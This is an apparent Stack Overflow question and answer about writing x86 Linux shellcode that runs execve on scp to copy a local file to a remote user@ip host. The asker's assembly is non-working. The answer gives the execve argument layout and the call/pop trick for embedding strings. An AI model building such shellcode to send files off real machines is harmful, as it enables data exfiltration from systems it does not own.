assembly x86: execve with multiple args

Question

I want to write a shellcode that execute a sys_execve("/usr/bin/scp","usr/bin/scp",args,NULL).

This is the full command:
scp -i /tmp/file -P 8989 /path/file user@ip:/home/user

The problem is that i need a lot of register (there are 6 tokens after the scp):

cdq

push edx
push user@ip:/home/user
mov edi,esp

push edx
push /path/file
mov esi,esp

push edx
push 8989
mov ecx,esp

push edx
push -P
mov eax,esp

push edx
push /tmp/file
???

push edx
push -i
???

push edx
push /usr/bin/scp
mov ebx,esp

I tried to push the registers like this:

cdq

push edx
push user@ip:/home/user
mov edi,esp

push edx
push /path/file
mov esi,esp

push edx
push 8989
mov ecx,esp

push edx
push -P
mov eax,esp

push edx
push edi
push esi
push ecx
push eax
mov ecx,esp

push edx
push /tmp/file
mov edi,esp

push edx
push -i
mov esi,esp

push edx
push /usr/bin/scp
mov ebx,esp

push edx
push ecx
push edi
push esi
push ebx
mov ecx,esp

int 0x80

But using gdb and libemu i saw that were produces only garbage bytes.
Any hint on how to solve this problem?

possible duplicate of [sys\_execve system call from Assembly](http://stackoverflow.com/questions/9342410/sys-execve-system-call-from-assembly) — Joachim Isaksson, May 12 '14 at 19:32

Martin Rosenau · Answer 1 · 2014-05-13T11:18:49.280

push /path/file

What should this instruction do?

Push the address of a string?

Write the string itself to the stack?

I tried to push the registers like this:

What you have to do is the following:

Push the value 0 (32-bit)
Push pointers (32-bit each) to every environment string to be used
Copy the ESP register to EDX (mov edx,esp)
Push the value 0 and pointers to every command line argument (including the executable name which is argv[0]); push the last argument first
Copy ESP to ECX
Write a pointer to the executable file name to EBX
Write 0x0B to EAX
Perform "int 0x80"

(Assuming you use Linux)

--- EDIT ---

Do not store everything in registers!

I would store fixed strings in program code:

  call xx
xx:
  pop edx
  lea ecx,[edx+p1-xx]
  push ecx  # ecx is now a pointer to "/some/file"
  lea ecx,[edx+p2-xx]
  push ecx  # ecx is now a pointer to "/other/file"
  ...
  int 0x80
p1:
  db "/some/file",0
p2:
  db "/other/file",0

THX! But my problem is that I haven't enough register. I have to write 6 tokens (and a every token take a register). I have a space problem and I don't know how to solve it :( — polslinux, May 12 '14 at 20:48

assembly x86: execve with multiple args

1 Answers1